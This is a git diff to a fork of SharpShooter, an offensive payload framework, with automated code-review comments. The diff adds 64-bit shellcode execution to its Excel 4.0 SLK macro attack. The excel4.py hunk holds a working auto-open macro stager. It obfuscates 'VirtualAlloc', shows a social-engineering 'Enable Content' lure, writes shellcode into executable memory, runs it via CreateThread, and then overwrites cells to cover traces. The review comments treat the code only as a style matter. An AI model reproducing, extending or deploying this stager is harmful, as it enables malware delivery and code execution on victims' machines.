diff --git a/Readme.md b/Readme.md
index e5460a0..452ab0c 100644
--- a/Readme.md
+++ b/Readme.md
@@ -10,6 +10,7 @@ Description
 ===========
+====SharpShooter fork to add compatibility for 64-bit processes for the .SLK Macros 4.0 attack.====
 SharpShooter is a payload creation framework for the retrieval and execution of arbitrary CSharp source code. SharpShooter is capable of creating payloads in a variety of formats, including HTA, JS, VBS and WSF. It leverages James Forshaw's [DotNetToJavaScript](https://github.com/tyranid/DotNetToJScript) tool to invoke methods from the SharpShooter DotNet serialised object. Payloads can be retrieved using Web or DNS delivery or both; SharpShooter is compatible with the MDSec ActiveBreach PowerDNS project. Alternatively, stageless payloads with embedded shellcode execution can also be generated for the same scripting formats.
@@ -160,4 +161,4 @@ Credits:
 - [@buffaloverflow](https://twitter.com/buffaloverflow): Rich Warren for Demiguise
 - [@arvanaghi](https://twitter.com/arvanaghi) and [@ChrisTruncer](https://twitter.com/ChrisTruncer): Brandon Arvanaghi and Chris Truncer for CheckPlease
 - [@subTee](https://twitter.com/subtee): Documentation for Squiblydoo and Squiblytwo techniques
-- [@StanHacked](https://twitter.com/stanhacked): Excel 4.0 technique and code examples
\ No newline at end of file
+- [@StanHacked](https://twitter.com/stanhacked): Excel 4.0 technique and code examples
diff --git a/SharpShooter.py b/SharpShooter.py
index 9b10de1..8243d04 100644
--- a/SharpShooter.py
+++ b/SharpShooter.py
@@ -64,6 +64,7 @@ def validate_args(self):
 parser.add_argument("--amsi", metavar="", dest="amsi", default=None, help="Use amsi bypass technique: amsienable")
 parser.add_argument("--delivery", metavar="", dest="delivery", default=None, help="Delivery method: web, dns, both")
 parser.add_argument("--rawscfile", metavar="", dest="rawscfile", default=None, help="Path to raw shellcode file for stageless payloads")
+ parser.add_argument("--rawscfile64", metavar="", dest="rawscfile64", default=None, help="Path to raw shellcode file for stageless payloads. [64bit shellcode]")
 parser.add_argument("--shellcode", action='store_true', help="Use built in shellcode execution")
 parser.add_argument("--scfile", metavar="", dest="shellcode_file", default=None, help="Path to shellcode file as CSharp byte array")
 parser.add_argument("--refs", metavar="", dest="refs", default=None, help="References required to compile custom CSharp,\ne.g. mscorlib.dll,System.Windows.Forms.dll")
@@ -559,8 +560,7 @@ def run(self, args):
 f.write(macro_stager)
 if(payload_type == 9):
- payload = excel4.generate_slk(args.rawscfile)
-
+ payload = excel4.generate_slk(args.rawscfile, args.rawscfile64)
 if(args.comtechnique):
 if not args.awltechnique or args.awltechnique == "wmic":
 payload_file = "output/" + outputfile + ".xsl"
diff --git a/modules/excel4.py b/modules/excel4.py
index 7982917..2ed1044 100644
--- a/modules/excel4.py
+++ b/modules/excel4.py
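Review bot: `--rawscfile64` keeps `default=None`, yet the `run` hunk further down in this file now passes `args.rawscfile64` straight into `excel4.generate_slk`, whose new helper opens that path unconditionally, so omitting the flag for payload type 9 surfaces as a `TypeError` from `open(None)` deep inside the module instead of an argument error. The body of `validate_args` that would hold such a check is outside the hunk, so I cannot see whether one was added; if not, a `parser.error(...)` when payload type 9 is chosen without both paths belongs there. The help string should also state the new coupling, e.g. `help="Path to raw 64-bit shellcode file for stageless payloads; required together with --rawscfile for SLK output"`.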
@@ -10,27 +10,62 @@ def bytes2int(str):
 SHELLCODE_HEADER = """ID;P
 O;E
-NN;NAuto_open;ER1C1;KSpreadsheet;F
-C;X1;Y1;K0;ER1C2()
-C;X1;Y2;K0;ECALL("Kernel32","VirtualAlloc","JJJJJ",0,1000000,4096,64)
-C;X1;Y3;K0;ESELECT(R1C2:R1000:C2,R1C2)
-C;X1;Y4;K0;ESET.VALUE(R1C3, 0)
-C;X1;Y5;K0;EWHILE(LEN(ACTIVE.CELL())>0)
-C;X1;Y6;K0;ECALL("Kernel32","WriteProcessMemory","JJJCJJ",-1, R2C1 + R1C3 * 20,ACTIVE.CELL(), LEN(ACTIVE.CELL()), 0)
-C;X1;Y7;K0;ESET.VALUE(R1C3, R1C3 + 1)
-C;X1;Y8;K0;ESELECT(, "R[1]C")
-C;X1;Y9;K0;ENEXT()
-C;X1;Y10;K0;ECALL("Kernel32","CreateThread","JJJJJJJ",0, 0, R2C1, 0, 0, 0)
-C;X1;Y11;K0;EHALT()
+NN;NAuto_open;ER5C102;KSpreadsheet;F
+C;X1;Y1;K"Enable Content to update file encoding."
+C;X102;Y1;K"Vir"
+C;X102;Y2;K"tual"
+C;X102;Y3;K"All"
+C;X102;Y4;K"oc"
+C;X102;Y5;K0;ECONCATENATE(R1C102,R2C102,R3C102,R4C102)
+C;X102;Y6;K0;ER1C103()
+C;X103;Y1;K0;EERROR(FALSE, R2C103:R3C103)
+C;X103;Y2;K""C:\\Program Files (x86)\\Microsoft Office\\root""
+C;X103;Y3;K0;EDIRECTORY(R2C103)
+C;X103;Y4;K0;EIF(ISERROR(R3C103), R1C100(), R1C104())
+C;X104;Y1;K0;ER1C105()
+C;X104;Y2;K0;ECALL("Kernel32",R5C102,"JJJJJ",0,%s,4096,64)
+C;X104;Y3;K0;ESELECT(R1C105:R1000:C105,R1C105)
+C;X104;Y4;K0;ESET.VALUE(R1C99, 0)
+C;X104;Y5;K0;EWHILE(LEN(ACTIVE.CELL())>0)
+C;X104;Y6;K0;ECALL("Kernel32","WriteProcessMemory","JJJCJJ",-1, R2C104 + R1C99 * 20,ACTIVE.CELL(), LEN(ACTIVE.CELL()), 0)
+C;X104;Y7;K0;ESET.VALUE(R1C99, R1C99 + 1)
+C;X104;Y8;K0;ESELECT(, "R[1]C")
+C;X104;Y9;K0;ENEXT()
+C;X104;Y10;K0;ECALL("Kernel32","CreateThread","JJJJJJJ",0, 0, R2C104, 0, 0, 0)
+C;X104;Y11;K0;ER11C100()
+C;X100;Y1;K0;ER1C101()
+C;X100;Y2;K0;ECALL("Kernel32",R5C102,"JJJJJ",1342177280,%s,12288,64)
+C;X100;Y3;K0;ESELECT(R1C101:R1000:C101,R1C101)
+C;X100;Y4;K0;ESET.VALUE(R1C99, 0)
+C;X100;Y5;K0;EWHILE(LEN(ACTIVE.CELL())>0)
+C;X100;Y6;K0;ECALL("kernel32", "RtlCopyMemory", "JJCJ",R2C100 + R1C99 * 20,ACTIVE.CELL(),LEN(ACTIVE.CELL()))
+C;X100;Y7;K0;ESET.VALUE(R1C99, R1C99 + 1)
+C;X100;Y8;K0;ESELECT(, "R[1]C")
+C;X100;Y9;K0;ENEXT()
+C;X100;Y10;K0;ECALL("Kernel32","CreateThread","JJJJJJJ",0, 0, R2C100, 0, 0, 0)
+C;X100;Y11;K0;ESELECT(R1C1, R1C1)
+C;X100;Y12;K0;ESET.VALUE(R1C1, "AAAAAAA")
+C;X100;Y13;K0;ESET.VALUE(R2C1, "BBBBBBB")
+C;X100;Y14;K0;ESET.VALUE(R3C1, "CCCCCCC")
+C;X100;Y15;K0;ESET.VALUE(R4C1, "DDDDDDD")
+C;X100;Y16;K0;ESET.VALUE(R5C1, "EEEEEEE")
+C;X100;Y17;K0;ESET.VALUE(R6C1, "FFFFFFF")
+C;X100;Y28;K0;EHALT()
 """
-def generate_slk(shellcode_path):
- return build_shellcode_slk(shellcode_path)
+def generate_slk(shellcode_path, shellcode_path64):
+ return build_shellcode_slk(shellcode_path, shellcode_path64)
-def build_shellcode_slk(shellcode_path):
+def build_shellcode_slk(shellcode_path, shellcode_path64):
 #print("[*] Building shellcode exec SLK")
+ slk_shellcode_32, size32 = build_shellcode_arch(shellcode_path, 105)
+ slk_shellcode_64, size64 = build_shellcode_arch(shellcode_path64, 101)
+ slk_output = SHELLCODE_HEADER % (size32, size64)
+ slk_output+= slk_shellcode_32 + slk_shellcode_64 + "\nE"
+ return slk_output
- slk_output = SHELLCODE_HEADER
+def build_shellcode_arch(shellcode_path, raw):
+ output = ""
 with open(shellcode_path, "rb") as f:
 byte = f.read(1)
 i = 0
@@ -38,15 +73,15 @@ def build_shellcode_slk(shellcode_path):
 while byte != "":
 if i == 0:
 cell=cell+1
- slk_output+=("C;X2;Y%s;K0;E" % (str(cell)))
+ output+=("C;X%s;Y%s;K0;E" % (raw, str(cell)))
 else:
- slk_output+=("&")
- slk_output+=("CHAR(" + str(bytes2int(byte)) + ")")
+ output+=("&")
+ output+=("CHAR(" + str(bytes2int(byte)) + ")")
 byte = f.read(1)
 i+=1
 if i == 20:
- output+=("\n")
+ output+=("\n")
 i = 0
 cell=cell+1
- slk_output+=("\nC;X2;Y%s;K0;ERETURN()\nE\n" % (str(cell)))
- return slk_output
\ No newline at end of file
+ output+=("\nC;X%s;Y%s;K0;ERETURN()\n" % (raw, str(cell)))
+ return output, cell * 20
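Review bot: The new `build_shellcode_arch(shellcode_path, raw)` has no docstring, and its second parameter is named `raw` although both call sites pass a column number (105 and 101) that is emitted as the `X` field of every cell record it writes; `column` would say what it is. A docstring along the lines of "Read the file at shellcode_path and encode it as SLK cell records in the given column; returns the record text and the cell count times 20 (apparently the size substituted into SHELLCODE_HEADER)" would let a reader follow `build_shellcode_slk` without tracing the format string. `generate_slk` also now requires a second positional argument, so the old one-argument call form fails with a `TypeError`; that is worth stating in its docstring since the only updated caller I can see is the one in SharpShooter.py. The helper's body continues into the next hunk.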
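Review bot: The rewritten append lines keep the parenthesised operands and a redundant `str(cell)` inside a `%s` format, which reads as if the parentheses did something; `output += "C;X%s;Y%s;K0;E" % (raw, cell)` and `output += "\nC;X%s;Y%s;K0;ERETURN()\n" % (raw, cell)` are equivalent and are the conventional form (`%s` already calls `str`). Note `cell` is read and incremented here but initialised outside the hunk, so the hunk alone does not show its starting value.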